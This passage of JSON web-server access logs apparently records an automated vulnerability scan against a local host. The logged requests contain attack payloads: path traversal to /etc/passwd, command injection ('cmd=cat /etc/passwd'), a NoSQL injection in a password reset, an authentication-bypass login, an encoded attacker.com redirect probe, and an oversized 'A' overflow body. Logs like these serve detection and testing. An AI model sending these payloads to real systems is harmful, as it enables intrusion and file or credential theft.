/wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"{\x22id\x22: 1, \x22method\x22: \x22global.login\x22, \x22params\x22: {\x22authorityType\x22: \x22Default\x22, \x22clientType\x22: \x22NetKeyboard\x22, \x22loginType\x22: \x22Direct\x22, \x22password\x22: \x22Not Used\x22, \x22passwordType\x22: \x22Default\x22, \x22userName\x22: \x22admin\x22}, \x22session\x22: 0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /RPC2_Login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"{\x22code\x22: {\x22$gt\x22: 0}, \x22password\x22: \x22SuperStrongPassword1\x22, \x22passwordConfirmation\x22: \x22SuperStrongPassword1\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/auth/reset-password HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"{\x22hapi\x22:{\x22username\x22:\x22Administrator\x22,\x22password\x22:\x22any_password\x22,\x22language\x22:\x22en\x22,\x22mode\x22:\x22gui\x22, \x22usesshkey\x22:true, \x22privatekey\x22:\x22any_privateky\x22, \x22passphrase\x22:\x22any_passphase\x22,\x22settings\x22:{\x22output_filter\x22:\x22passed\x22,\x22port_number\x22:\x22444\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /session/create HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apiclient/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/admin/login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"cmd=cat /etc/passwd\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download/C%3a%2fwindows%2fsystem.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA